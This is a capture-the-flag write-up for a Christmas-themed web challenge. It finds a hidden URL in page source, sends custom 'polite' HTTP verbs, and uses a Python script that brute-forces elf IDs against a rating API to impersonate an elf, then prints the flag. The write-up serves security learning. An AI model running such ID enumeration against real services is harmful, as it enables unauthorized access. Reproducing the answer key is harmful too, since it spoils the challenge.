# Escaping The Naughty List

## Question

```txt
    irc.alils.us Message of the Day - Holiday Greetings.
    [anon#134]: "This year you definitely want to be on the nice list."
    > "Any reason, more than the usual?"
    [anon#134]: "Well... Santa has been collecting all of the Scalper Goods."
    > "You don't mean... I can finally get one of..."
    [anon#134]: "Indeed. You most definitely can."
    > "I don't think you understand. I absolutely need to be on the nice list."
    [anon#134]: "Well there's one way that you can ensure we are both on the nice list."
    [anon#134]: "Hack in. Sending you the details soon."
```

## Hint

1) Searching the source is a great way to identify secrets that people don't want you to see.
2) Remember to use your manners.

## Solve

Here's the page when you first view it:

![start](images/escaping_the_naughty_list_start.png)

The first hint says to view the source, so lets do that:

![source](images/escaping_the_naughty_list_source1.png)

There happens to be some hidden text through some CSS trickery. If you look at the hiddent text: `:// + . + . /`, you might realize it looks like the [format for a URL](https://developer.mozilla.org/en-US/docs/Learn/Common_questions/What_is_a_URL).

Since the start of the URL should be `https://`, looking at the source code text again, you should see (all the capitals are highlighted):

![source](images/escaping_the_naughty_list_source2.png)

Giving the following url: `https://ctf.opensecurity.io/ons` which redirects to `https://please.let.me.in.alils.us/`.

Heading over to that url. Gives the following information:

```txt
This website is property of the North Pole. No grinches are allowed! All
interaction with confidential services require proper manners. Please refer
to the Elf handbook on proper etiquette when interacting with HTTP Servers.
Lack of proper manners may subject you to criminal prosecution. Evidence of
inadequate etiquette collected during monitoring may be used for
administrative, criminal, or other adverse action. Web servers are
configured to only permit <b>POLITE HTTP VERBS</b>
```

So the **POLITE HTTP VERBS** is the clue here. First, HTTP verbs? If you do not know what those are then you can read HTTP [request methods (MDN)](https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods). Now that we have a list verbs, let see what happens when we send one (use [Firefox](https://www.mozilla.org/en-US/firefox/new/) or some other method to manually send a http request).

1) Open **Web Development Tools** using `CTRL + SHIFT + I`.
2) Click on the **Network** tab. If you have a **reload** button, click that and let the page reload before continuing.
3) Then, click the first GET method (1); right-click and hit **Edit and Resend** in the drop down (2).

    ![get](images/escaping_the_naughty_list_get1.png)

4) We get the following box to the right:

    ![get](images/escaping_the_naughty_list_get2.png)

    So, we need to somehow modify the verb `GET` and then hit **Send**. The second hint tells us to be polite. So, lets change the `GET` to `PLEASEGET`, because using "please" is polite!

    > It's also in the URL!

    Then, click on the new response with the method `PLEASEGET`. Choose the **Response** tab. You will get an API guidebook:

    ```txt
    [][][][][][][][][][][]  [The Naughty and Nice API]  [][][][] [-] [+] [x][]
    [========================================================================]
    |The custom HTTP Wrapper created for elfs by elfs.                       |
    | >> PLEASEGET /createID                                                 |
    | - Registers a new UUID for a human, so that they can be put on a list  |
    |   using our proprietary blockchain-based algorithm.                    |
    |                                                                        |
    | >> PLEASEGET /profile                                                  |
    | - URL Parameters : uuid [string]                                       |
    | - Shows the current christmas rating and whether the user is eligible  |
    |   for the nice list                                                    |
    |                                                                        |
    | >> PLEASEPOST /rate                                                    |
    | - URL Parameters : elf [int], rate [int], uuid [string]                |
    | - Endpoint that elves with a valid "id" can nominate humans for the    |
    |   nice list                                                            |
    | - Score is 0 to 5, 5 being a perfectly nice list candidate             |
    | - Higher "Elf Ratings", better odds to land on the Nice List!          |
    |                                                                        |
    | ** Remember: Elves always use their manners                         ** |
    [________________________________________________________________________]
    ```

5) Now, we have an API we can use. So reading this API, `PLEASEPOST /rate` has way to nominate ourselves for the nice list. It requires 3 things: `elf [int]`, `rate [int]`, `uuid [string]`. Out of these 3 things, the `uuid` has a API endpoint. Lets start there.

    Same as before, use the **Edit and Resend** option on the network call. Change the url to `https://please.let.me.in.alils.us/createID` (from the API docs) and hit **Send**. Check the **Response** tab.

    ```txt
    _________________________________________________________________________
    [][][][][][][][][][][]  [The Naughty and Nice API]  [][][][] [-] [+] [x][]
    [========================================================================]
    |                                                                        |
    |                           Creating Profile...                          |
    |                                                                        |
    | + - @ # ( ^ & * ( ^ $ ( ^ & # @ ! @ $ ^ & & * ( ^ $ * @ ! ! # ( ^ @ !  |
    |                                                                        |
    |                                 DONE                                   |
    |                                                                        |
    |                   e6106c0e-8227-44ea-a090-fa34cdaf3479                 |
    |                                                                        |
    [________________________________________________________________________]
    ```

    So, our uuid is `e6106c0e-8227-44ea-a090-fa34cdaf3479`. We still need an `elf` to impersonate.

    If you check the `/profile` endpoint with our uuid by using `https://please.let.me.in.alils.us/profile?uuid=e6106c0e-8227-44ea-a090-fa34cdaf3479`.

    ```txt
    ________________________________________________________________________
    [][][][][][][][][][][]  [The Naughty and Nice API]  [][][][] [-] [+] [x][]
    [========================================================================]
    |                                                                        |
    |                                                                        |
    |                               ? ? ? ? ?                                |
    |                                                                        |
    |                                                                        |
    [________________________________________________________________________]
    ```

    The "?" must match the 0 to 5 rating system. So, we need to try different `elf` to see if we can change the rating system.

6) Find a `elf`, I created the following script:

    ```python
    import requests

    # Basic information for our request
    url = "https://please.let.me.in.alils.us"
    uuid = "5296a94c-160a-4b09-bb6d-8b316d370066"
    rate = 5
    elf = 0

    # Set some headers
    headers = {
        "User-Agent": "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0",
    }

    # Set post params to be sent with POST request
    post_params = {"uuid": uuid, "rate": rate, "elf": elf}

    # Set get params to be sent with GET request
    get_params = {"uuid": uuid}

    while True:
        elf += 1
        post_params["elf"] = elf

        print(f"[+] trying elf ...{elf}")

        # Yes you are using "params" instead of "data" here for a post request. 
        # This is unusual but still works fine.
        req_post = requests.request(
            "PLEASEPOST", f"{url}/rate", params=post_params, headers=headers
        )

        if req_post.text.find("Invalid") == -1:
            req_get = requests.request(
                "PLEASEGET", f"{url}/profile", params=get_params, headers=headers
            )

            if req_get.text.find("?") == -1:
                print(req_get.text)
                break
    ```

    This will enumerate `elf` ids starting at 1. If we get "Invalid" in the response, try another `elf`. After that, do a get to check the profile to see if it was updated.

    ```text
    [+] trying elf ...1
    [+] trying elf ...2
    [+] trying elf ...3
    [+] trying elf ...4
    [+] trying elf ...5
    [+] trying elf ...6
    [+] trying elf ...7
    [+] trying elf ...8
    [+] trying elf ...9
    [+] trying elf ...10
    [+] trying elf ...11
    [+] trying elf ...12
    [+] trying elf ...13
    [+] trying elf ...14
    [+] trying elf ...15
    [+] trying elf ...16
    [+] trying elf ...17
    [+] trying elf ...18
    [+] trying elf ...19
    [+] trying elf ...20
    [+] trying elf ...21
    [+] trying elf ...22
    [+] trying elf ...23
    [+] trying elf ...24
    [+] trying elf ...25
    [+] trying elf ...26
    [+] trying elf ...27
    [+] trying elf ...28
    [+] trying elf ...29
    [+] trying elf ...30

     ________________________________________________________________________
    [][][][][][][][][][][]  [The Naughty and Nice API]  [][][][] [-] [+] [x][]
    |                                                                        |
    |                                                                        |
    |                               * * * * *                                |
    |                                                                        |
    |                                                                        |
    |               You are guaranteed to be on the Nice List!               |
    |   For Christmas Santa is getting you a os{rtX_sup3r_3090_ftw_Ed1t10n}  |
    [________________________________________________________________________]
    ```

flag: os{rtX_sup3r_3090_ftw_Ed1t10n}
